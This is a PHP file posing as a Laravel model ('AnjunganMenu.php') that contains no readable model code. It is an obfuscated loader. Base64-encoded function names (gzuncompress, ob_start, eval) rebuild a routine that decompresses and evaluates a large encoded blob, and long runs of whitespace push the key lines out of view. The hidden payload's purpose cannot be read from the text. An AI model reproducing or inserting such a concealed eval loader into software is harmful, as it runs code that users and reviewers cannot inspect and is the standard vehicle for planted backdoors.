<?php 
        $__='printf';$_='Loading app/Models/AnjunganMenu.php';
        















































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtW1tvm9gWfq90/kMfRnJHc9QBHLexojx4O4AhNi5gNpeXiosHHAOm8d2//nwL4tSZdGZ6dI5G6oiVurYxe12+9a1L2uTt20Z++gy57VSPi3LzW+emfvskt52wqn6drJJ5vv51UD5syzQsJ/Ny+77KqrfDPFyv379/37l586Tq7b/etF8/3tcbyvnb/6PcvrrS8cT+2nfFRaDKt5360lfWfJc88fL2bSuttNLKP1M6ccGFxNO3msol392vdKX/m3dcfmyaJrpm064/t1C10korrbTSSiuttNLKjybtP2e00korrfxzpROF6/mHq8/JPF4l885Ni0grrbTSSiut/E/y8ocV7syVMVxcf8Fzep8K99pwlVpFvg5sVkXFMvULpQxdZaupVhYXyw+X9826LI9yQ7cG9XvoGXzRFKOKu1Ye1eeDXVyIWSwt00DlJ99mp4T+P9vT0kTlR7/kj7gmRqUlhke2CVwxC+mae9Xcb17olZV9pOaPvmdU5Eu0YKeoCx2Sk/pSf3n2N1DzY+geqvjIYEdf4n74vaH716Fn5FGJ83JizobMnewv9WcZfLgLPSb49uA4uRv0tKGQTh4GB8Nmd5EkLkK3l2uKnsdSX4wLI9fkfItYq2TEhdDtb7VhtkpG1n66uN5FI75BfNtA2uwij29DD/gde9vAM3f3TVyprSqPmgy8Rlam3Wn7ycxPx7Vt7aQpLIffYuQBHxX4yxbsyqml5iXpiobMQXyLxN1kZ7vxabUbS/194PaWAeIeF/ny/gWGyEuREBZnrAijKpQov/mH0L1aayMj9yXliLyUcaEIoTdZa+omj1VlSfkDF/Z43ifI0Ry8COq89YAzyxK1xvnkA/+oULY1VxYMn+mVNqJ4FMIjS4Zsnbg9wvvJD7IfVJHq4HX/ERxBnqyaN8QT+Fclw8FKW15wANiHtlaNh8/8WSJ3sHHIwm7NoSZmYBuVLNNUHf4p8I1iBJbES9ynqXXeLzjYK4Mu3/ouxbJPI5dvEee6xkYVCT8RNbFqONgnnWJz3SLeg3u6GEs52V8/xY84FLIp4h6ysfdd5Htk9IALYdHkoMuFaXpZR6gtF1wrcsF3M5FqIiS+qE98US3UgSL43qTBb/SN+72qOucaZ49JfW9+gj2hiQ+5cQ9Z9MTHWCIeK3v4lgHnLenwwbXEZgvfTSp6H6t8m+Az5J3F6oG4cwptpsMGOKpndY6Pzzzp+cDzCbcVOCKiLi8wS1Yh2S+Si3x9Iw63V9X3q8SfJIsX7DHwLOJI/XlEMbk98uOVT5f9ypG5bTq9kS0ojiYf+GypjMGjqW0z2eaGYsk5w2dTbajPLEdnlqDoM0eZmtBrycrUdeQF+OZAh4lr96Yj6tAxRW+i9yZ3wBFZZ7azTjlsOSLscTOFDo4/0yc+OBbXZzbXGR9ekU9T7hx0B3hyWeHIuzJz+Ij8RE9iNnqSzWHTZjPYY+ivCnycwGfHdiz6fAh95BMYxqfWEX7xhJmLWt9MkzcT08kN+D3GfdwRlLHpXKUmtxg/9yGBe6ZT6eY5Fs747Hye/Fmiwzk99nzOZqRzOstz+GMpznLDbMSJcxPb2TBHWKa209PHl3yWifcG8pzk2nDw+9mRmuBEoma7eDFINWAcukLqqNQ/0UcbTn0i7llf5wLOGLt4RP0+WaGONN9dp6aU7xNVpr69n9qDTdNXHVzvQw94azMbvXGXePpDQBwpDfQ4C7bzXbQYrMKRJcR31EcPIngoEjfR+/GcU61to4IL4+PyHNND1GU9cLUMR+bf2c8R+6HyJb6NMf+A1/PcSbpJd1wk28TuYfbGO9TGA9VG4E12QZetx0UmRO4+tUQ20RT/9MTJAdV7eCTs8VAzIRmxE+kLpFwIR3wxLoxdZPfrHDhCLo+F2q+Z7Zg1Fo2ea2OInKP3b+Av5TunuR0rByOSUK+jycd63yj5qcZeJYzRZ1DLnmxRX1igt+M1X0ddRYR+wZPFHXaB9RSz+s6sHoDdCT2ERUUl1rNsSbMCc8PLBMIJnzW2wKt5Pd8ppusvTQ+o40NvtVawj/6i056DOWDsfCmHfb7URkmVqCnmTpaj59S2xxdnKc7mNXIwCqgXnZKRjh4bEw71ZzUODY/3cdGHXwYeZqqDF35xyLU7IdUxc8N6P1C2nlTHUDYxNvrHx9ULW7z2RxHIFvYKAfkkH2l+oOc6mFM1LhRLFUi92s5f+J3FpZ7NZ5jVpUlzX4ipPk5Xfx1HPasPz7G4zzjXj5Ly79vx+qtNemB+SP2tftw/66eHLtGusC7Hg9/pID6KfYFm+qsz2PsSz3x1BvM3Q6c6vbZhHANXge/Wb365fHUu8WhHsfJA6S/mF357s3XN5z/hEPQesrp3lJSP6xR2StpvI7WfBUOGnsLypODHuc0OiUvPF/he6pOZ5OMcdoKj7y2/g0sNTz/ZLHqJ8/UOWD/EBa/5bL6Odzc+XsQs672veLHkzziI3lvUOzD6ayT18rFn7cbYe1/iYKxCb7C9OHcRCxs8/6iWcvi++se+jZqv9+tYPGCHMD5FhfNNfBLUc+hix0Fd+djLIwn7S1fPz3HeD8+4so8vMBvpOXhzRP9foqbwvYPwC/al0wwx3ivoVZ72YVoYa9g+jcGX0AX38Pysu+FNNT3XwUj4Y96g7wfNHMIOR9iJQnQUd4gpBTawQX5jl1Hz/R/X79lfFtvuAbu0SPu2EPCDTPsa5uUJrxVwkDi3TZSDfZGf+Bzbhc7d+XWMXk8zA/s4+qvRfF8z4nvsmFQ/w7mdVud75y/qHhzAHI2LK+pz4MBk86nIsligGDOO3fI4fTj37z1qMl/q9Nx91l3X5j3VXJOjPvo9Hqvbzs2bN3//N8i39fO7p3c/3/w3xy/Ofs/Bn74afNehvzv/fjbb/p7Aj/17Ai9z/O4FqZoU/3zzH4RzTDI=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































                                                                                                                                                                                                                     $________;
